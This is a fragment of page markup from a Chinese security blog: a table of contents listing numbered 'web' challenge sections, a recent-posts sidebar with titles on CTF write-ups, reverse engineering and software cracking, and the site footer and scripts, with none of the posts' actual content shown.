class="toc-number">1.</span> <span class="toc-text">web 89</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web-90"><span class="toc-number">2.</span> <span class="toc-text">web 90</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web-91"><span class="toc-number">3.</span> <span class="toc-text">web 91</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web-92"><span class="toc-number">4.</span> <span class="toc-text">web 92</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web93"><span class="toc-number">5.</span> <span class="toc-text">web93</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web94"><span class="toc-number">6.</span> <span class="toc-text">web94</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web-95"><span class="toc-number">7.</span> <span class="toc-text">web 95</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web-96"><span class="toc-number">8.</span> <span class="toc-text">web 96</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web-97"><span class="toc-number">9.</span> <span class="toc-text">web 97</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web98"><span class="toc-number">10.</span> <span class="toc-text">web98</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web99"><span class="toc-number">11.</span> <span class="toc-text">web99</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web100"><span class="toc-number">12.</span> <span class="toc-text">web100</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web101"><span class="toc-number">13.</span> <span class="toc-text">web101</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web102"><span class="toc-number">14.</span> <span class="toc-text">web102</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web103"><span class="toc-number">15.</span> <span class="toc-text">web103</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web104-106"><span class="toc-number">16.</span> <span class="toc-text">web104 106</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web105"><span class="toc-number">17.</span> <span class="toc-text">web105</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web107"><span class="toc-number">18.</span> <span class="toc-text">web107</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web108"><span class="toc-number">19.</span> <span class="toc-text">web108</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web109"><span class="toc-number">20.</span> <span class="toc-text">web109</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web110"><span class="toc-number">21.</span> <span class="toc-text">web110</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web111"><span class="toc-number">22.</span> <span class="toc-text">web111</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web112"><span class="toc-number">23.</span> <span class="toc-text">web112</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web113"><span class="toc-number">24.</span> <span class="toc-text">web113</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web114"><span class="toc-number">25.</span> <span class="toc-text">web114</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web115"><span class="toc-number">26.</span> <span class="toc-text">web115</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web123"><span class="toc-number">27.</span> <span class="toc-text">web123</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web125"><span class="toc-number">28.</span> <span class="toc-text">web125</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web126"><span class="toc-number">29.</span> <span class="toc-text">web126</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web127"><span class="toc-number">30.</span> <span class="toc-text">web127</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web128"><span class="toc-number">31.</span> <span class="toc-text">web128</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web129"><span class="toc-number">32.</span> <span class="toc-text">web129</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web130"><span class="toc-number">33.</span> <span class="toc-text">web130</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web131"><span class="toc-number">34.</span> <span class="toc-text">web131</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web132"><span class="toc-number">35.</span> <span class="toc-text">web132</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web133"><span class="toc-number">36.</span> <span class="toc-text">web133</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web-134"><span class="toc-number">37.</span> <span class="toc-text">web 134</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web-135"><span class="toc-number">38.</span> <span class="toc-text">web 135</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web-136"><span class="toc-number">39.</span> <span class="toc-text">web 136</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web-137"><span class="toc-number">40.</span> <span class="toc-text">web 137</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web-138"><span class="toc-number">41.</span> <span class="toc-text">web 138</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web-139"><span class="toc-number">42.</span> <span class="toc-text">web 139</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web-140"><span class="toc-number">43.</span> <span class="toc-text">web 140</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web-141"><span class="toc-number">44.</span> <span class="toc-text">web 141</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web-142"><span class="toc-number">45.</span> <span class="toc-text">web 142</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web-143"><span class="toc-number">46.</span> <span class="toc-text">web 143</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web-144"><span class="toc-number">47.</span> <span class="toc-text">web 144</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web-145"><span class="toc-number">48.</span> <span class="toc-text">web 145</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web-146"><span class="toc-number">49.</span> <span class="toc-text">web 146</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web-147"><span class="toc-number">50.</span> <span class="toc-text">web 147</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web-148"><span class="toc-number">51.</span> <span class="toc-text">web 148</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web-149"><span class="toc-number">52.</span> <span class="toc-text">web 149</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#web-150"><span class="toc-number">53.</span> <span class="toc-text">web 150</span></a></li></ol></div></div><div class="card-widget card-recent-post"><div class="item-headline"><i class="fas fa-history"></i><span>最新文章</span></div><div class="aside-list"><div class="aside-list-item"><a class="thumbnail" href="/2023/11/06/2023%E8%93%9D%E5%B8%BD%E6%9D%AF%E5%86%B3%E8%B5%9BWP/" title="2023蓝帽杯决赛WP"><img src="https://xyhutc.oss-cn-qingdao.aliyuncs.com/giteetuchuang/20231106163334.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="2023蓝帽杯决赛WP"/></a><div class="content"><a class="title" href="/2023/11/06/2023%E8%93%9D%E5%B8%BD%E6%9D%AF%E5%86%B3%E8%B5%9BWP/" title="2023蓝帽杯决赛WP">2023蓝帽杯决赛WP</a><time datetime="2023-11-06T08:31:51.000Z" title="发表于 2023-11-06 16:31:51">2023-11-06</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2023/10/20/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8CRE/" title="攻防世界RE"><img src="https://xyhutc.oss-cn-qingdao.aliyuncs.com/giteetuchuang/c78ed35b1e3999643d52a652257558af0a15b4c9_raw.jpg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="攻防世界RE"/></a><div class="content"><a class="title" href="/2023/10/20/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8CRE/" title="攻防世界RE">攻防世界RE</a><time datetime="2023-10-20T12:38:32.000Z" title="发表于 2023-10-20 20:38:32">2023-10-20</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2023/09/22/%E5%AE%89%E5%8D%93%E5%B8%B8%E7%94%A8%E7%9B%AE%E5%BD%95/" title="安卓常用目录"><img src="https://xyhutc.oss-cn-qingdao.aliyuncs.com/giteetuchuang/mmexport1694863328916.jpg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="安卓常用目录"/></a><div class="content"><a class="title" href="/2023/09/22/%E5%AE%89%E5%8D%93%E5%B8%B8%E7%94%A8%E7%9B%AE%E5%BD%95/" title="安卓常用目录">安卓常用目录</a><time datetime="2023-09-22T01:27:02.000Z" title="发表于 2023-09-22 09:27:02">2023-09-22</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2023/09/22/010Editor%E7%A0%B4%E8%A7%A3/" title="010Editor破解"><img src="https://xyhutc.oss-cn-qingdao.aliyuncs.com/giteetuchuang/1694867487605.jpg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="010Editor破解"/></a><div class="content"><a class="title" href="/2023/09/22/010Editor%E7%A0%B4%E8%A7%A3/" title="010Editor破解">010Editor破解</a><time datetime="2023-09-22T00:33:10.000Z" title="发表于 2023-09-22 08:33:10">2023-09-22</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2023/08/24/%E6%9F%90APP%E7%9A%84%E9%80%86%E5%90%91%E5%88%86%E6%9E%90/" title="某APP的逆向分析"><img src="https://xyhutc.oss-cn-qingdao.aliyuncs.com/giteetuchuang/a4c8982faff8839d06cc010c864e02e8092efb23_raw.jpg" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="某APP的逆向分析"/></a><div class="content"><a class="title" href="/2023/08/24/%E6%9F%90APP%E7%9A%84%E9%80%86%E5%90%91%E5%88%86%E6%9E%90/" title="某APP的逆向分析">某APP的逆向分析</a><time datetime="2023-08-24T14:02:11.000Z" title="发表于 2023-08-24 22:02:11">2023-08-24</time></div></div></div></div></div></div></main><footer id="footer"><div id="footer-wrap"><div class="copyright">&copy;2020 - 2024 By 惜缘怀古</div><div class="framework-info"><span>框架 </span><a target="_blank" rel="noopener" href="https://hexo.io">Hexo</a><span class="footer-separator">|</span><span>主题 </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly</a></div></div></footer></div><div id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="阅读模式"><i class="fas fa-book-open"></i></button><button id="darkmode" type="button" title="浅色和深色模式转换"><i class="fas fa-adjust"></i></button><button id="hide-aside-btn" type="button" title="单栏和双栏切换"><i class="fas fa-arrows-alt-h"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="设置"><i class="fas fa-cog fa-spin"></i></button><button class="close" id="mobile-toc-button" type="button" title="目录"><i class="fas fa-list-ul"></i></button><button id="go-up" type="button" title="回到顶部"><i class="fas fa-arrow-up"></i></button></div></div><div><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.umd.js"></script><div class="js-pjax"></div><script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div></body></html>